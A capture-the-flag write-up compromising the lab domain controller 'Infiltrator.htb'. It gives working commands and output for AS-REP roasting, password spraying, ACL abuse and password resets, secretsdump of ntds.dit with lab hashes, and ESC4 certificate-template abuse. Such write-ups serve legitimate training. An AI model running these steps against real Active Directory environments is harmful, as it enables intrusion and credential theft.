PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-21 15:15:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after: 2025-01-29T13:20:17
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-21T15:16:36+00:00
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49729/tcp open msrpc Microsoft Windows RPC
49759/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-21T15:16:38
|_ start_date: N/A
Based on the open ports and the returned data I’m dealing with a Domain Controller. It exposes the hostname dc01.infiltrator.htb along with the domain infiltrator.htb - I’ll add those to my /etc/hosts file.
HTTP
The webpage is about a digital marketing campaign and showcases what they provide to customers. There’s a search and a contact form but both seem to be without a real function. Near the end of the page the members of the team are introduced.
To build a list of potential users, I’ll scrape the 7 names and add them to a file called names.txt.
names.txt
David AndersonOlivia MartinezKevin TurnerAmanda WalkerMarcus HarrisLauren ClarkEthan Rodriguez
Next I’ll run username-anarchy on the names to generate a long list with combinations of the provided names.
$ ./username-anarchy --input-file ../names.txt > ../usernames.txt$ head -n 10 ../usernames.txtdaviddavidandersondavid.andersondavidanddaviandedavidad.andersondandersonadavida.david
Kerberos
I supply the generated list to kerbrute and check for valid usernames. Apparently the format of the usernames in the domain is first letter of the firstname, followed by a dot and the lastname. I’ll add those 7 names to another list to keep track of the valid accounts.
Next I feed the valid users into Get-NPUsers from impacket to check if any of those users do not require Kerberos Pre-Authentication. It looks like l.clark is such an account and I can procceed to crack the hash to retrieve the password.
impacket-GetNPUsers -usersfile users.txt \ -format hashcat \ -outputfile hash \ -dc-host dc01.infiltrator.htb \ INFILTRATOR.HTB/Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set$krb5asrep$23$l.clark@INFILTRATOR.HTB:1a250f7ba95f791d3a3f12386842b8c0$b16cbb0e7afc669ab2c33ecd7196b546b795d4e0a846e962b48f59f43402956445e8dc9dfc0683f245556fad51982836ca24172e179cf8f208b10d5cb3235b46e1cb82d01f5093c9588a03e39fae53f4be50e684cce2b83efa1da9e88436d86c492634c897d61924429e7a4d64efe24d17b8dd01cefc758f8302c858d821407ce54953326d6e97e964141670eda4d68ee67b40f0e05cc56235fd8b82d7d3d0dac4d990ee5555ff7fbf374971b219aa8c411dff9ac0b096cf52deceef544f086407b4fb90113f1580c3b2ebfccc488bc3e0eb4176f9eeab4de352ba56c36a219f183edafbf94bc8ca9e37641b5c44166d4fe5
hashcat takes a few moments and is able to crack the password with rockyou.txt and returns WAT?watismypass!.
With the newly obtained credentials I list all local users on the Domain Controller with nxc. By default it also lists the description of the accounts where sometimes passwords are stored. This comes back with 12 accounts and the password MessengerApp@Pass! for k.turner.
I add both passwords to a file and then check for password reusage. It does look like multiple accounts might share the same password but are not allowed to login (STATUS_ACCOUNT_RESTRICTION)1.
Maybe those users can only login via Kerberos, so I’ll use the user and password list for a password spray with kerbrute. This finds valid credentials for d.anderson.
Feeding generated data into BloodHound shows an interesting path from d.anderson to m.harris.
Abuse the Generic All to apply a Access Control Entry (ACE) that all objects in the Marketing Digital group inherit
Generic All on e.rodriguez and take over account
Add oneself into the Chiefs Marketing group
Reset the password for m.harris
I begin the path by requesting a new TGT for d.anderson and export it as KRB5CCNAME environment variable to be used for authentication. Then I use dacledit to apply a new ACE with FullControl over the object with distinguished name OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB (visible through Bloodhound).
impacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/d.anderson:WAT?watismypass!'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Saving ticket in d.anderson.ccacheexport KRB5CCNAME=d.anderson.ccacheimpacket-dacledit -action 'write' \ -rights 'FullControl' \ -inheritance \ -principal 'd.anderson' \ -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' \ -dc-ip dc01.infiltrator.htb \ -k \ -no-pass \ 'INFILTRATOR.HTB/d.anderson'[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU[*] DACL backed up to dacledit-20241021-191805.bak[*] DACL modified successfully!
Next I proceed to reset the password for user e.rodriguez.
impacket-changepasswd -k \ -no-pass \ -dc-ip dc01.infiltrator.htb \ -altuser INFILTRATOR.HTB/d.anderson \ -altpass 'WAT?watismypass!' \ -newpass 'Helloworld123!' \ -reset \ 'INFILTRATOR.HTB/e.rodriguez@dc01.infiltrator.htb'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Setting the password of INFILTRATOR.HTB\e.rodriguez as INFILTRATOR.HTB\d.anderson[*] Connecting to DCE/RPC as INFILTRATOR.HTB\d.anderson[*] Password was changed successfully.[!] User no longer has valid AES keys for Kerberos, until they change their password again.
I request another TGT as e.rodriguez and then add that user to the Chiefs Marketing group with bloodyAD. Before resetting the password of m.harris I need to renew my TGT so that the new group membership is applied.
impacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/e.rodriguez:Helloworld123!'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Saving ticket in e.rodriguez.ccacheexport KRB5CCNAME=e.rodriguez.ccachebloodyAD -d INFILTRATOR.HTB \ -k \ --host dc01.infiltrator.htb \ add groupMember 'Chiefs Marketing' 'e.rodriguez'[+] e.rodriguez added to Chiefs Marketingimpacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/e.rodriguez:Helloworld123!'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Saving ticket in e.rodriguez.ccachebloodyAD -d INFILTRATOR.HTB \ -k \ --host dc01.infiltrator.htb \ set password 'm.harris' 'Helloworld123!'
At last I request another TGT, this time as m.harris and set the environment variable accordingly. Then I use evil-winrm to get a shell on the system and read the first flag.
impacket-getTGT -dc-ip dc01.infiltrator.htb infiltrator.htb/m.harris:'Helloworld123!'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Saving ticket in m.harris.ccacheexport KRB5CCNAME=m.harris.ccacheevil-winrm -i dc01.infiltrator.htb -r infiltrator.htb
Info
In order to use evil-winrm with kerberos authentication, the package krb5-user should be installed.
The file /etc/krb5.conf should also have the following content:
For some reason the session with evil-winrm is very unstable and I switch over to sliver.
Looking around on the system I find an installation of Output Messenger Server and remember I’ve already found credentials in the LDAP description that might work there. To interact with the application I install the client and forward a few ports2.
Apparently the application needs 14118 - 30, so I’ll forward those ports with chisel. Then I start the outputmessenger and login with the credentials k.turner:MessengerApp@Pass! while specifying 127.0.0.1 as server.
Besides the ability to read the chat rooms and initiate personal chats, there’s also the Wall with posts regarding the missing pre-authentication and the UserExplorer app project. The sample usage shows the password D3v3l0p3r_Pass@1337! for user m.harris.
Next I log out (or actually kill the app because the button is not working…) and perform a login as m.harris with the password I just found. The group chats are exactly the same but there’s a personal chat with Admin where a version of the UserExplorer.exe was sent to m.harris.
After setting the output directory in the messengers’ settings, I can download the file from the chat. Examining it with file shows that it’s a .NET assembly. I move the binary to my Windows VM and load it into dnSpy.
The code is fairly simple and resembles a LDAP lookup tool. It does contain hardcoded credentials for the user winrm_svc even though they are encrypted with AES.
private static void Main(string[] args){ string path = "LDAP://dc01.infiltrator.htb"; string text = ""; string text2 = ""; string text3 = ""; string text4 = "winrm_svc"; string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE="; int i = 0; while (i < args.Length) { string text5 = args[i].ToLower(); if (text5 != null) { if (!(text5 == "-u")) { if (!(text5 == "-p")) { if (!(text5 == "-s")) { if (!(text5 == "-default")) { goto IL_C2; } text = text4; text2 = Decryptor.DecryptString("b14ca5898a4e4133bbce2ea2315a1916", cipherText); } else { text3 = args[i + 1]; } } else { text2 = args[i + 1]; } } else { text = args[i + 1]; } i += 2; continue; } IL_C2: Console.WriteLine(string.Format("Invalid argument: {0}", args[i])); return;
It passes the ciphertext TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE= and the key b14ca5898a4e4133bbce2ea2315a1916 to the DecryptString() function in another part of the application. There a new AES decryptor is initialized with IV set to 16 null bytes and then used to decrypt the ciphertext after base64 decoding it.
using System;using System.IO;using System.Security.Cryptography;using System.Text;// Token: 0x02000002 RID: 2public class Decryptor{ // Token: 0x06000002 RID: 2 RVA: 0x00002058 File Offset: 0x00000258 public static string DecryptString(string key, string cipherText) { string result; using (Aes aes = Aes.Create()) { aes.Key = Encoding.UTF8.GetBytes(key); aes.IV = new byte[16]; ICryptoTransform cryptoTransform = aes.CreateDecryptor(aes.Key, aes.IV); using (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(cipherText))) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, 0)) { using (StreamReader streamReader = new StreamReader(cryptoStream)) { result = streamReader.ReadToEnd(); } } } } return result; }}
Replicating the steps in Cyberchef returns another base64 encoded string. Repeating the same actions returns the plaintext password WinRm@$svc^!^P. Once again I change the user in the chat application.
Access as o.martinez
As winrm_svc I have access to a personal chat with o.martinez where she talks about suspicious behaviour on her account. She mentions that she only shared the password in the Chief Marketing Chat. Unfortunately none of the accounts, I currently have credentials for, has access to this chat room. Like I already did before with the other accounts I check if there are any additional information on the wall, calendar and the notes. At first there’s nothing but right-clicking and choosing Sync Notes lets one note called app management appear containing an API key558R501T5I6024Y8JV3B7KOUN1A518GG.
The API for the Output Messenger Server requires the key to be set as custom HTTP header API-KEY and offers REST endpoints for users, groups, rooms and notifications3. Even though I can list the available rooms and see that A.walker has also access to the chatroom, I cannot read the logs because I’m missing the roomkey variable. Modifying the room or users does not work either, probably because the permissions on the API key are too restrictive.
Since the user winrm_svc, as the name already suggests, can use evil-winrm to get an interactive shell, I run my sliver payload through that. Then I check locally for any interesting artifacts concerning Output Messenger since the Linux application, albeit official, felt very unstable so potentially things just didn’t work properly.
In C:\users\winrm_svc\appdata\roaming\Output Messenger\JAAA I find two SQLite3 databases and transfer them to my host. Looking through OM.db3 I can find references to the Chiefs_Marketing_chat including something that looks like a roomkey: 20240220014618@conference.com.
Trying out the roomkey and using a pretty wide date range, I’m able to dump the logs from the chat room and it does in fact contain the password m@rtinez@1996!.
curl -s -H 'API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG' 'http://127.0.0.1:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2000/01/01&todate=2030/01/01' | jq .{ "success": true, "logs": "<REMOVED CSS><div class='room_log'><div class='logdateorange'>20/02/2024</div><div class='datebox'> <span class='datefont'>20<br></span><span class='monthfont'>Feb</span></div><br><br><div id='greybk'><div class='logfromName'><img src='/temp/hash_dark_20.png' class='middle' title='' /> Chiefs_Marketing_chat: A.walker, O.martinez</div></div><br><div id='greybk'><span class='nickname' >A.walker Says: </span><div class='msg_time'>02:05 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Hey, hope you're doing well! What tasks do you have on your plate today?</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:06 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Thanks! I'm working on the new marketing campaign and reviewing the budget for Q4. How about you?</div><br /></div><div id='greybk'><span class='nickname' >A.walker Says: </span><div class='msg_time'>02:08 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Sounds busy! By the way, I need to check something in your account. Could you share your username password?</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:09 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >sure!</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:09 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >O.martinez : m@rtinez@1996!</div><br /></div></div>"}
Once again I’ll repeat the same logout / kill and log in with new credentials procedure as before. Now I have access as o.martinez and see the previous dumped chat.
I’ve already noticed before that this account status’ was set to idle and viewing the profile confirms that there’s another session active on the Domain Controller.
According to the documentation it should be possible to run applications at specific times with the Reminder feature, but it seems like this is not implemented on Linux and therefore I install the application in my Windows VM. On there I can set a new calendar entry that runs my sliver payload that I previously put into C:\temp\m.exe.
For good measure I refresh and sync the calenders (right-click) and eventually there’s a callback with a new session from o.martinez. Based on the previous experience I’ll check for additional data in C:\users\o.martinez\appdata\roaming\output messenger\faaa and find one received file, a packet capture called network_capture_2024.pcapng.
Examining the packet capture in Wireshark shows some network traffic with a webserver. Filtering for just HTTP traffic limits the view to a login, followed by listing files and a download of Bitlocker-backup.7z. Then the authentication token is changed with a POST to /api/change_auth_token. Inspecting the details on this packet reveals the new token to be M@rtinez_P@ssw0rd! and checking the validity for this password returns success for o.martinez.
Furthermore I also extract the 7z file from the capture by going to File⇒Export Objects⇒HTTP. A new window opens where I can choose the object to save and I’ll pick the line with content type application/octet-stream and save it to disk.
Given the sensitive nature of the file, based on the name, it is password-protected. It’s none of the previously found passwords and that’s why I extract the hash with 7z2john and try to crack the hash with john.
7z2john BitLocker-backup.7z > 7z_hashATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashesjohn --fork=10 --wordlist=/usr/share/wordlists/rockyou.txt 7z_hashUsing default input encoding: UTF-8Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])Cost 1 (iteration count) is 524288 for all loaded hashesCost 2 (padding size) is 8 for all loaded hashesCost 3 (compression type) is 2 for all loaded hashesCost 4 (data length) is 209048 for all loaded hashesNode numbers 1-10 of 10 (fork)Press 'q' or Ctrl-C to abort, almost any other key for statuszipper (BitLocker-backup.7z)--- SNIP ---
It takes a bit of time but the password zipper is found, letting me extract the archive. In there is just one single HTML file, but it contains the Bitlocker Recovery Key.
Trying my luck with RDP and the credentials for o.martinez works. I’m able to login and there’s a locked disk mounted at E:.
Access as lan_managment
Double-clicking the encrypted disk, I’m prompted to enter the password but there’s also the option to provide the backup key. Doing that unlocks the disk and I get access to E:\Windows Server 2012 R2 - Backups.
Enumerating the backups I eventually find Backup_Credentials.7z on the desktop of Administrator and transfer this file via the mounted directory in RDP.
This time the archive is not password protected and extracts right away. It does contain the ntds.dit and a backup of the registry hives SECURITY and SYSTEM. So this is enough to use secretsdump and get all passwords from the domain backup.
tree.├── Active Directory│ └── ntds.dit├── Backup_Credentials.7z└── registry ├── SECURITY └── SYSTEM3 directories, 4 filesimpacket-secretsdump -security registry/SECURITY \ -system registry/SYSTEM \ -ntds Active\ Directory/ntds.dit \ localImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACC$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00[*] DefaultPassword(Unknown User):ROOT#123[*] DPAPI_SYSTEMdpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909[*] NL$KM 0000 2E 8A EC D8 ED 12 C6 ED 26 8E B0 9B DF DA 42 B7 ........&.....B. 0010 49 DA B0 07 05 EE EA 07 05 02 04 0E AD F7 13 C2 I............... 0020 6C 6D 8E 19 1A B0 51 41 7C 7D 73 9E 99 BA CD B1 lm....QA|}s..... 0030 B7 7A 3E 0F 59 50 1C AD 8F 14 62 84 3F AC A9 92 .z>.YP....b.?...NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Searching for pekList, be patient[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299[*] Reading and decrypting hashes from Active Directory/ntds.ditAdministrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::[*] Kerberos keys from Active Directory/ntds.ditDC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0fDC$:des-cbc-md5:5eea34b3317aea91krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540krbtgt:des-cbc-md5:10bfc49ecd3b58d9infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606ainfiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ceinfiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403finfiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfcinfiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefdinfiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2finfiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfdinfiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448ainfiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153binfiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109binfiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838bainfiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0cinfiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d[*] Cleaning up...
Unfortunately those hashes do not work anymore - to be expected from an old backup. Luckily there’s more than just hashes contained within ntds.dit4. ntdsdotsqlite can be used to extract those information and export it as SQLite3 database.
ntdsdotsqlite Active\ Directory/ntds.dit --system registry/SYSTEM -o ntds.sqlitesqlite3 ntds.sqliteSQLite version 3.46.0 2024-05-23 13:25:27Enter ".help" for usage hints.sqlite> .tablescontainers groups trusted_domainsdomain_dns machine_accounts user_accountsdomains organizational_unitssqlite> SELECT samaccountname,description FROM user_accounts;Administrator|Built-in account for administering the computer/domainGuest|Built-in account for guest access to the computer/domainkrbtgt|Key Distribution Center Service Accountwinrm_svc|User Security and Management Specialistlan_managment|l@n_M@an!1331M.harris|Head of Development DepartmentD.anderson|L.clark|O.martinez|A.walker|K.turner|E.rodriguez|
As already seen previously with another password, the description for lan_managment contains a string that might be a password. Testing those credentials with nxc confirms l@n_M@an!1331 to be the password for that account.
Shell as Administrator
Checking for potential edges in BloodHound returns that this user can read the password of the group managed service account infiltrator_svc$. Next I retrieve the NTLM hash with nxc and get 407546ca61cd7d3870e7dc6b0b007ecd.
Then I check for vulnerable certificate templates with certipy-ad and it finds a template called Infiltrator_Template that’s vulnerable to ESC4.
certipy-ad find -vulnerable \ -u 'infiltrator_svc$@infiltrator.htb' \ -hashes :407546ca61cd7d3870e7dc6b0b007ecd \ -target dc01.infiltrator.htbCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP[!] Failed to connect to remote registry. Service should be starting now. Trying again...[*] Got CA configuration for 'infiltrator-DC01-CA'[*] Saved BloodHound data to '20241023181945_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k[*] Saved text output to '20241023181945_Certipy.txt'[*] Saved JSON output to '20241023181945_Certipy.json'cat 20241023181945_Certipy.txtCertificate Authorities 0 CA Name : infiltrator-DC01-CA DNS Name : dc01.infiltrator.htb Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149 Certificate Validity Start : 2023-12-08 01:42:38+00:00 Certificate Validity End : 2124-08-04 18:55:57+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : INFILTRATOR.HTB\Administrators Access Rights ManageCertificates : INFILTRATOR.HTB\Administrators INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins ManageCa : INFILTRATOR.HTB\Administrators INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins Enroll : INFILTRATOR.HTB\Authenticated UsersCertificate Templates 0 Template Name : Infiltrator_Template Display Name : Infiltrator_Template Certificate Authorities : infiltrator-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : PublishToDs PendAllRequests IncludeSymmetricAlgorithms Private Key Flag : ExportableKey Extended Key Usage : Smart Card Logon Server Authentication KDC Authentication Client Authentication Requires Manager Approval : True Requires Key Archival : False Authorized Signatures Required : 1 Validity Period : 99 years Renewal Period : 650430 hours Minimum RSA Key Length : 2048 Permissions Object Control Permissions Owner : INFILTRATOR.HTB\Local System Full Control Principals : INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Owner Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Dacl Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Property Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System [!] Vulnerabilities ESC4 : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions
With infiltrator_svc$ I can modify the vulnerable template, so I’ll make it vulnerable to ESC1 and then request a new certificate while providing administrator@infilatrator.htb as Subject Alternative Name.
